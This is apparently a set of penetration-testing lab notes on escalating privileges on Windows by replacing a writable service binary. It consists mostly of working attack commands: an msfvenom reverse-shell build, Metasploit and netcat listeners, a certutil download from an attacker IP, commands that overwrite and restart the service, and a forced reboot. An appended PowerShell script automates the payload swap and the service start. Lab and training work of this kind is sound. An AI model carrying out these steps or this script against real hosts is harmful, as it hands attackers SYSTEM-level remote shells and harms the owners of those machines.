
EXPLOITING SERVICE WITH METASPLOIT

  1. We can use msfvenom to create a reverse shell payload. The -f exe-service format wraps the payload in a binary that answers the Service Control Manager correctly, so the SCM does not kill it for failing to respond at start-up; a plain -f exe would usually be terminated after the 30-second start timeout.
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=[PORT] -f exe-service -o reverse.exe

    NOTE

    If we had found this service running from the Program Files (x86) folder, we may want to consider making a 32-bit executable (-p windows/shell_reverse_tcp, without the x64), as a 64-bit one may not work for the service.

  2. Start your listener on the attacking machine. The handler's payload must match what msfvenom built: reverse.exe above is a stageless windows/x64/shell_reverse_tcp, so the handler is set to that payload as well (a meterpreter handler would not understand the plain shell that connects back).
    msfconsole -q -x "use multi/handler; set payload windows/x64/shell_reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"

    NOTE

    Alternatively, because the payload is a plain (non-meterpreter) shell, we can start a listener using nc on the same port given as LPORT, e.g. sudo rlwrap -cAr nc -lvnp 1338.

  3. After starting the listener, transfer reverse.exe to the target machine, serving it from the attacking machine (for example with python3 -m http.server 8000 in the directory containing reverse.exe). certutil writes the file to the current directory, so run it from C:\Temp (or wherever the next step expects it).
    certutil -urlcache -f http://10.11.92.52:8000/reverse.exe reverse.exe

  4. To exploit the service, replace filepermservice.exe with reverse.exe, while maintaining the original binary name.

    Copy-Item -Path "C:\Temp\reverse.exe" -Destination "C:\Program Files\File Permissions Service\filepermservice.exe" -Force

    NOTE

    For cmd, we can use the following command: copy /y c:\Temp\reverse.exe "c:\Program Files\File Permissions Service\filepermservice.exe"

  5. Now, all we have to do is restart the service on the target machine so the SCM executes our binary in the service's (usually SYSTEM) context: run sc stop filepermsvc if the service is running, then sc start filepermsvc or net start filepermsvc. Note that the service name used by sc (filepermsvc) differs from the binary name (filepermservice.exe); sc qc filepermsvc shows the binary path and start type if you need to confirm them.

    IMPORTANT

    If we cannot stop or start the service ourselves but SeShutdownPrivilege is enabled, we can reboot the machine and let the service restart on its own. This only works if the service's start type is Automatic (check with sc qc filepermsvc); a Manual or Disabled service will not come back after the reboot.

    shutdown /r /t 0 /f
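The steps above done as one script on the target, with the checks a practitioner wants before overwriting a service binary. This is an added example, not part of the original notes: it resolves the binary path from the SCM instead of hardcoding it, stops the service first so the executable is not locked, proves write access by actually opening the file, and keeps a backup so the original can be restored. The service name filepermsvc and the C:\Temp\reverse.exe path come from the notes; the .bak backup name is an assumption.

```powershell
# Added example (not from the original notes). Assumes the notes' service name
# and payload path; adjust for your target. Run it from a PowerShell prompt
# on the machine where reverse.exe was already transferred.
$ServiceName = 'filepermsvc'
$Payload     = 'C:\Temp\reverse.exe'

if (-not (Test-Path $Payload)) { throw "Payload not found at $Payload" }

# Resolve the on-disk binary and start type from the SCM rather than guessing.
$svc = Get-CimInstance Win32_Service -Filter "Name='$ServiceName'"
if (-not $svc) { throw "Service $ServiceName not found" }

# PathName may be quoted and may carry arguments; keep only the executable.
if ($svc.PathName -match '^"([^"]+)"') { $binPath = $Matches[1] }
else { $binPath = $svc.PathName.Split(' ')[0] }
Write-Host "[*] Binary    : $binPath"
Write-Host "[*] StartMode : $($svc.StartMode)   State: $($svc.State)   RunsAs: $($svc.StartName)"

# A running service holds its executable open, so stop it before replacing.
if ($svc.State -eq 'Running') {
    sc.exe stop $ServiceName | Out-Null
    if ($LASTEXITCODE -ne 0) { throw "Cannot stop $ServiceName (exit $LASTEXITCODE)" }
    Start-Sleep -Seconds 3
}

# Show the DACL for the record, then test effective write access by opening
# the file for writing (the only check that accounts for group membership,
# inherited ACEs and deny entries together).
icacls $binPath
try {
    $fs = [System.IO.File]::Open($binPath, 'Open', 'Write')
    $fs.Close()
    Write-Host "[+] $binPath is writable by $env:USERNAME"
} catch {
    throw "[-] No write access to $binPath : $($_.Exception.Message)"
}

# Keep the original so the service can be restored after the engagement.
$backup = "$binPath.bak"   # assumed backup name
if (-not (Test-Path $backup)) { Copy-Item -Path $binPath -Destination $backup -Force }
Write-Host "[*] Original preserved at $backup"

# Swap in the payload under the original filename, then start the service so
# the SCM executes it in the service's account (SYSTEM for this lab).
Copy-Item -Path $Payload -Destination $binPath -Force
sc.exe start $ServiceName
if ($LASTEXITCODE -ne 0) {
    Write-Warning "sc start failed (exit $LASTEXITCODE); if SeShutdownPrivilege is held and StartMode is Auto, 'shutdown /r /t 0 /f' will trigger it"
}
```

Restore afterwards with Copy-Item -Path "$binPath.bak" -Destination $binPath -Force followed by sc stop and sc start, so the host is left as found.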